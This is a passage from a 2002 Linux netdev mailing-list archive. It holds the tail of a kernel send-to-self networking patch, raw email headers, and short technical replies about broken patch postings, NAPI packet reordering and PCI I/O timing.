-                                iph->daddr, iph->saddr);
+                                iph->daddr, iph->saddr, netdevice_id);
         if (!req)
             goto out;
 
@@ -1394,7 +1417,7 @@
 #define want_cookie 0 /* Argh, why doesn't gcc optimize this :( */
 #endif
 
-    /* Never answer to SYNs send to broadcast or multicast */
+    /* Never answer to SYNs sent to broadcast or multicast */
     if (((struct rtable
*)skb->dst)->rt_flags &
         (RTCF_BROADCAST|RTCF_MULTICAST))
         goto drop;
@@ -1452,6 +1475,10 @@
     req->af.v4_req.rmt_addr = saddr;
     req->af.v4_req.opt = tcp_v4_save_options(sk, skb);
     req->class = &or_ipv4;
+#ifdef CONFIG_NET_SENDTOSELF
+    req->bound_dev_if = sk->bound_dev_if;
+#endif
+
     if (!want_cookie)
         TCP_ECN_create_request(req, skb->h.th);
 
@@ -1587,11 +1614,12 @@
     struct iphdr *iph = skb->nh.iph;
     struct tcp_opt *tp = &(sk->tp_pinfo.af_tcp);
     struct sock *nsk;
-
+    int device_id = tcp_v4_iif(skb);
+
     /* Find possible connection requests. */
     req = tcp_v4_search_req(tp, &prev,
                             th->source,
-                            iph->saddr, iph->daddr);
+                            iph->saddr, iph->daddr, device_id);
     if (req)
         return tcp_check_req(sk, skb, req, prev);
 
@@ -1599,7 +1627,7 @@
                                      th->source,
                                      skb->nh.iph->daddr,
                                      ntohs(th->dest),
-                                     tcp_v4_iif(skb));
+                                     device_id);
 
     if (nsk) {
         if (nsk->state != TCP_TIME_WAIT) {

--------------010703030901020509080500--

From davem@redhat.com Tue Sep 17 23:48:42 2002
Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 23:48:44 -0700 (PDT)
Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I6mftG010892 for ; Tue, 17 Sep 2002 23:48:42 -0700
Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id XAA19447; Tue, 17 Sep 2002 23:44:40 -0700
Date: Tue, 17 Sep 2002 23:44:40 -0700 (PDT)
Message-Id: <20020917.234440.114538956.davem@redhat.com>
To: greearb@candelatech.com
Cc: netdev@oss.sgi.com, linux-kernel@vger.kernel.org
Subject: Re: [PATCH] Networking: send-to-self
From: "David S.
Miller"
In-Reply-To: <3D88217A.6070702@candelatech.com>
References: <3D88217A.6070702@candelatech.com>
X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-archive-position: 252
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

We saw it the first two times.

From greearb@candelatech.com Tue Sep 17 23:48:43 2002
Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 23:48:44 -0700 (PDT)
Received: from grok.yi.org (IDENT:8yZNJ/NmETFwOW9CllocmHE3iFZDeVrA@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I6mftG010891 for ; Tue, 17 Sep 2002 23:48:42 -0700
Received: from candelatech.com (IDENT:q9nq1Tgk2c6yJiVKQ9ZPimv1uETcQLug@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8I6rev23389; Tue, 17 Sep 2002 23:53:40 -0700
Message-ID: <3D8822F4.6060201@candelatech.com>
Date: Tue, 17 Sep 2002 23:53:40 -0700
From: Ben Greear
Organization: Candela Technologies
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Ben Greear
CC: "'netdev@oss.sgi.com'" , linux-kernel
Subject: Re: [PATCH] Networking: send-to-self
References: <3D88217A.6070702@candelatech.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-archive-position: 253
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: greearb@candelatech.com
Precedence: bulk
X-list: netdev

Ben Greear wrote:
> This patch allows one to use the SO_BINDTODEVICE and a new ioctl against
> net_device objects to send and receive regular routed traffic between two

Gack, sorry for the last patch..it seems I screwed up the patch process somehow.
Plz don't apply it as is!

--
Ben Greear
President of Candela Technologies Inc http://www.candelatech.com
ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear

From greearb@candelatech.com Wed Sep 18 00:04:50 2002
Received: with ECARTIS (v1.0.0; list netdev); Wed, 18 Sep 2002 00:04:52 -0700 (PDT)
Received: from grok.yi.org (IDENT:VGD6t3rHdICvYUoz4Q2sBS1O0V5iUL7I@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I74ntG012161 for ; Wed, 18 Sep 2002 00:04:50 -0700
Received: from candelatech.com (IDENT:BNFaWzdzIL33b/EQarKQjWf3fsYNhWfj@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8I79ov25480; Wed, 18 Sep 2002 00:09:51 -0700
Message-ID: <3D8826BE.5090007@candelatech.com>
Date: Wed, 18 Sep 2002 00:09:50 -0700
From: Ben Greear
Organization: Candela Technologies
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: "'netdev@oss.sgi.com'"
CC: linux-kernel
Subject: Re: [PATCH] Networking: send-to-self [link to non-broken patch this time]
References: <3D88217A.6070702@candelatech.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-archive-position: 254
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: greearb@candelatech.com
Precedence: bulk
X-list: netdev

So, I feel bad about wasting bandwidth and spamming folks with busted patches.
The corrected patch(es) can be found here for those who are interested:

http://www.candelatech.com/sts_2.4.19.patch
http://www.candelatech.com/sts2_hack.patch

Thanks,
Ben

--
Ben Greear
President of Candela Technologies Inc http://www.candelatech.com
ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear

From greearb@candelatech.com Wed Sep 18 00:09:35 2002
Received: with ECARTIS (v1.0.0; list netdev); Wed, 18 Sep 2002 00:09:37 -0700 (PDT)
Received: from grok.yi.org (IDENT:UsGhFwdIVTwOaEa97gSNym9y1Odxrr9t@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I79ZtG012565 for ; Wed, 18 Sep 2002 00:09:35 -0700
Received: from candelatech.com (IDENT:yBPxYISfCYn4IxKHZfHN3l0MTG9jYXDt@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8I7Eav26086 for ; Wed, 18 Sep 2002 00:14:36 -0700
Message-ID: <3D8827DC.4060200@candelatech.com>
Date: Wed, 18 Sep 2002 00:14:36 -0700
From: Ben Greear
Organization: Candela Technologies
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: "'netdev@oss.sgi.com'"
Subject: [PATCH] pktgen (link to non-busted patch this time)
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-archive-position: 255
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: greearb@candelatech.com
Precedence: bulk
X-list: netdev

Sorry for the confusion, the last patch was against vanilla 2.4.19, not
2.4.20-pre7 like it should have been.
You can find the corrected patch here if you are interested:

http://www.candelatech.com/pg_2.4.19.patch

Thanks,
Ben

--
Ben Greear
President of Candela Technologies Inc http://www.candelatech.com
ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear

From hadi@cyberus.ca Wed Sep 18 04:50:50 2002
Received: with ECARTIS (v1.0.0; list netdev); Wed, 18 Sep 2002 04:50:56 -0700 (PDT)
Received: from cyberus.ca (mail.cyberus.ca [216.191.240.111]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8IBontG019962 for ; Wed, 18 Sep 2002 04:50:50 -0700
Received: from shell.cyberus.ca (shell [216.191.240.114]) by cyberus.ca (8.9.3/8.9.3/Cyberus Online Inc.) with ESMTP id HAA08898; Wed, 18 Sep 2002 07:55:47 -0400 (EDT)
Received: from localhost (hadi@localhost) by shell.cyberus.ca (8.11.6+Sun/8.11.6) with ESMTP id g8IBmgT04722; Wed, 18 Sep 2002 07:48:43 -0400 (EDT)
X-Authentication-Warning: shell.cyberus.ca: hadi owned process doing -bs
Date: Wed, 18 Sep 2002 07:48:42 -0400 (EDT)
From: jamal
To: Ben Greear
cc: Chris Friesen , Cacophonix , ,
Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation
In-Reply-To: <3D87FBD5.3030508@candelatech.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 256
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: hadi@cyberus.ca
Precedence: bulk
X-list: netdev

On Tue, 17 Sep 2002, Ben Greear wrote:

> I see reordering on regular old socket calls from user space, and I see
> the same thing with pktgen packets as well (which clears the stack of fault).
>
> > Did you get reordering with affinity?
>
> Yes. I'm not sure I tried affinity w/out NAPI though. I definitely tried
> it with NAPI and saw reordering.
>

Ok, now it is getting interesting. I would start to be suspicious about
either the hardware or driver.
Please try without NAPI and affinity and post what you see (not that this
result matters but should help confirm things).

cheers,
jamal

From ebiederm@xmission.com Wed Sep 18 10:37:17 2002
Received: with ECARTIS (v1.0.0; list netdev); Wed, 18 Sep 2002 10:37:23 -0700 (PDT)
Received: from frodo.biederman.org (ebiederm.dsl.xmission.com [166.70.28.69]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8IHbGtG008270 for ; Wed, 18 Sep 2002 10:37:17 -0700
Received: (from eric@localhost) by frodo.biederman.org (8.9.3/8.9.3) id LAA07325; Wed, 18 Sep 2002 11:27:34 -0600
To: "David S. Miller"
Cc: hadi@cyberus.ca, akpm@digeo.com, manfred@colorfullife.com, netdev@oss.sgi.com, linux-kernel@vger.kernel.org
Subject: Re: Info: NAPI performance at "low" loads
References: <3D87A59C.410FFE3E@digeo.com> <20020917.180014.07882539.davem@redhat.com>
From: ebiederm@xmission.com (Eric W. Biederman)
Date: 18 Sep 2002 11:27:34 -0600
In-Reply-To: <20020917.180014.07882539.davem@redhat.com>
Message-ID:
Lines: 21
User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.1
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-archive-position: 257
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: ebiederm@xmission.com
Precedence: bulk
X-list: netdev

"David S. Miller" writes:

> From: jamal
> Date: Tue, 17 Sep 2002 20:57:58 -0400 (EDT)
>
> I am not so sure with that 6% difference there is no other bug lurking
> there; 6% seems too large for an extra two PCI transactions per packet.
>
> {in,out}{b,w,l}() operations have a fixed timing, therefore his
> results don't sound that far off.

???? I don't see why they should be. If it is a PCI device the cost should be
the same as a PCI memory I/O. The bus packets are the same. So things like
increasing the PCI bus speed should make it take less time.

Plus I have played with calibrating the TSC with outb to port
0x80 and there was enough variation that it was unusable.
On some newer systems it would take twice as long as on some older ones.

Eric

From alan@lxorguk.ukuu.org.uk Wed Sep 18 10:42:57 2002
Received: with ECARTIS (v1.0.0; list netdev); Wed, 18 Sep 2002 10:43:01 -0700 (PDT)
Received: from irongate.swansea.linux.org.uk (pc1-cwma1-5-cust128.swa.cable.ntl.com [80.5.120.128]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8IHgttG009095 for ; Wed, 18 Sep 2002 10:42:56 -0700
Received: from irongate.swansea.linux.org.uk (localhost [127.0.0.1]) by irongate.swansea.linux.org.uk (8.12.5/8.12.5) with ESMTP id g8IHou5a024147; Wed, 18 Sep 2002 18:50:56 +0100
Received: (from alan@localhost) by irongate.swansea.linux.org.uk (8.12.5/8.12.5/Submit) id g8IHorUU024145; Wed, 18 Sep 2002 18:50:53 +0100
X-Authentication-Warning: irongate.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f
Subject: Re: Info: NAPI performance at "low" loads
From: Alan Cox
To: "Eric W. Biederman"
Cc: "David S. Miller" , hadi@cyberus.ca, akpm@digeo.com, manfred@colorfullife.com, netdev@oss.sgi.com, linux-kernel@vger.kernel.org
In-Reply-To:
References: <3D87A59C.410FFE3E@digeo.com> <20020917.180014.07882539.davem@redhat.com>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 (1.0.8-10)
Date: 18 Sep 2002 18:50:53 +0100
Message-Id: <1032371453.20463.139.camel@irongate.swansea.linux.org.uk>
Mime-Version: 1.0
X-archive-position: 258
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: alan@lxorguk.ukuu.org.uk
Precedence: bulk
X-list: netdev

On Wed, 2002-09-18 at 18:27, Eric W. Biederman wrote:
> Plus I have played with calibrating the TSC with outb to port
> 0x80 and there was enough variation that it was unusable. On some
> newer systems it would take twice as long as on some older ones.

Port 0x80 isn't going to PCI space. x86 generally posts MMIO writes but not
I/O writes. That's quite measurable.
From davem@redhat.com Wed Sep 18 13:28:14 2002 Received: with ECARTIS (v1.0.0; list netdev); Wed, 18 Sep 2002 13:28:19 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8IKSDtG013250 for ; Wed,